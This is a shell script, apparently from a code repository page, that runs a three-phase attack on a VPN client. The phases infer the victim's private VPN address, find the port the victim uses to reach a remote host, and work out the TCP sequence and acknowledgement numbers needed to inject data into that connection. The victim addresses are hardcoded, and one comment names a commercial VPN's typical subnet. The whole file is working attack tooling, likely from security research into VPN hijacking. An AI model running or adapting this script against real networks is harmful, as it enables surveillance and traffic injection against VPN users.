You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
37 lines
1.3 KiB
37 lines
1.3 KiB
REMOTE_ADDR=$1
|
|
REMOTE_PORT=80
|
|
|
|
VICTIM_WLAN_ADDR=192.168.12.58 # vpn client public ip
|
|
WLAN_GATEWAY=192.168.12.1 # address of local network gateway
|
|
VICTIM_PRIV_NET=10.7.2.0 # nord uses 10.7.2.x typically
|
|
PRIV_NETMASK=255.255.255.0
|
|
|
|
REQUEST_SIZE=529
|
|
DEST_MAC=a4:34:d9:53:92:c4
|
|
INTERFACE=wlp1s0
|
|
|
|
echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 1 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
|
|
|
|
echo `date`
|
|
echo "attempting to infer client's private VPN address.."
|
|
|
|
cd ../first_phase
|
|
|
|
|
|
PRIV_IP="$(./send_p1 $DEST_MAC $VICTIM_PRIV_NET $PRIV_NETMASK $WLAN_GATEWAY $INTERFACE)"
|
|
echo "phase 1 client private IP: ${PRIV_IP}"
|
|
|
|
echo "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 2 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
|
|
echo `date`
|
|
echo "determining if client is talking to ${REMOTE_ADDR} on any port.."
|
|
cd ../sec_phase
|
|
VPORT="$(./send_p2 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC)"
|
|
echo "phase 2 port result: ${VPORT}"
|
|
|
|
echo "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 3 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
|
|
echo `date`
|
|
echo "beginning phase 3 to infer sequence and ack numbers needed to inject.."
|
|
cd ../third_phase
|
|
./send_p3 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC $VPORT $REQUEST_SIZE
|
|
|
|
echo `date`
|